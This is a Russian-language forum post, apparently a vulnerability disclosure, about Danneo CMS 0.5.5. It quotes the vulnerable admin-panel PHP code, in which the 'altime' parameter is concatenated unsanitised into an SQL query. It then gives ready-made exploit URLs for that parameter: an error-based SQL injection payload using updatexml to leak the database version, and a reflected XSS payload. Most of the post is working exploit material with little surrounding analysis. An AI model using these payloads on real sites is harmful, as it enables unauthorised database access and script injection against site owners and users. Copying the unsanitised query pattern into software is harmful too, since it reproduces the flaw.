
16.04.2014, 09:45
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме: 132418
Репутация:
652
|
|
Danneo CMS 0.5.5
Danneo CMS 0.5.5
SQL Injection
Уязвимый сценарий: http://127.0.0.1/cms_danneo/www/apanel/index.php
Уязвимый параметр: altime
Вектор: error-based
Требования: mq = off, права администратора
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]) && !empty([/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$ADMIN_LAST[/COLOR][COLOR="#007700"];
}
...
[/COLOR][COLOR="#0000BB"]$unewspid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetchrow[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) AS total FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$basepref[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_news_user WHERE (public >= '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"]));
[/COLOR][/COLOR]
Exploit:
[127.0.0.1/cms_danneo/www/apanel/index.php?dn=index&altime=1397482241'or(updatexml(1,concat(0x3a,version()),4))or'--&ops=your_data]
passive XSS (reflected)
Уязвим этот же праметр altime.
Exploit:
[127.0.0.1/cms_danneo/www/apanel/index.php?dn=index&altime=1397482241">alert(1)&ops=your_data]
|
|
|